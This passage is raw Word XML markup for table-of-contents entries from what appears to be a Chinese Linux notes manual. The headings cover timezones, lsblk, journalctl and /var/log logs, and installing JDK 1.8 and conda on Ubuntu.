            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>时间解说</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779695 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>182</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E48D181" w14:textId="49BE668F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779696" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>看</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>标准时间</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779696 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>183</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A9A3807" w14:textId="2B73B218" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779697" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>更改时区</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779697 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>183</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7964292D" w14:textId="0C4C453A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779698" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>不重启调整</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>小时格式为</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>小时格式：暂没找到这种</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779698 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>183</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="128C8BE0" w14:textId="388C4422" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779699" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>列出</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的块设备：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>lsblk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779699 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>184</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34DED2D6" w14:textId="735EFB17" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779700" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>查看日志</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779700 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>185</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="634B3A00" w14:textId="3D042B47" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779701" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>journalctl:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>查看</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>systemd</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>日志</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779701 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>186</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57FCFF2B" w14:textId="38859FBA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779702" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/var/log</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779702 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>187</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FD6076A" w14:textId="50B563EB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779703" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ubuntu</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>jdk1.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779703 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>187</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70E72B79" w14:textId="7479DE71" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779704" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ubuntu</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>conda</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>及使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779704 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>188</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F7BA31C" w14:textId="3BC78295" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779705" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>.condarc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779705 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>188</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="752D6793" w14:textId="28BCB3F1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779706" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>conda</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>写在</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>.bash_rc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779706 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>188</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69EB5CB9" w14:textId="68E25B0F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779707" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>conda</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>base</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>环境</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779707 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>189</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05511BD3" w14:textId="2D66B04E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779708" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>更新</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>conda</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779708 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>190</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13A50F60" w14:textId="1ED8D2B6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779709" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779709 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>191</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E4B7F50" w14:textId="1D2677C2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779710" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>conda</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>换源</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779710 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>192</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="715FE4B2" w14:textId="38E0AE12" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
